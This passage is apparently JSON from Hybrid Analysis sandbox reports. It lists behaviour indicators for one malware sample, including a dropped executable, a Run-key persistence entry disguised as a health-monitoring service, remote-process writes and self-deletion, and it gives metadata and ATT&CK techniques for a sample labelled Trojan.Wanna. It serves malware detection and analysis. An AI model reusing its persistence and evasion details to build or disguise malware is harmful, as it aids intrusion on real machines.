\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002420)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00004064)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00004064)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has a section named \".eh_fram\"\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" wrote 16248 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 180)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 180)\n \"6f6f0c8738159f59ea033d8d237433be7163ad062737e1eb4071ec9c0ae88511.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 180)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc
https://hybrid-analysis.com/sample/cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc
Hybrid Analysis - Ransomware
{"size": 2061938, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive", "submit_name": "cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc", "sha256": "cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc", "av_detect": 91, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 106, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 9.00 (Visual Studio 2008) (build: 30729)", "1 .RES Files linked with CVTRES.EXE 9.00 (Visual Studio 2008) (build: 30729)", "1 .EXP Files linked with LINK.EXE 9.00 (Visual Studio 2008) (build: 30729)", "103 .CPP Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)"], "imported_objects": ["21 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "143 .C Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)", "27 .ASM Files assembled with MASM 9.00 (Visual Studio 2008) (build: 30729)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a large codebase (103 files)"], "total_file_compositions_imports": 244}, "processes": [{"uid": "00000000-00006040", "name": "cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe", "normalized_path": "C:\\cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc.exe", "sha256": "cc63f36dc17a0a98aa80e296f467cda6a1e0771e8d1b224efe524b532e7bc3dc", "av_label": "Trojan.Wanna", "av_matched": 17, "av_total": 22}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Application Window 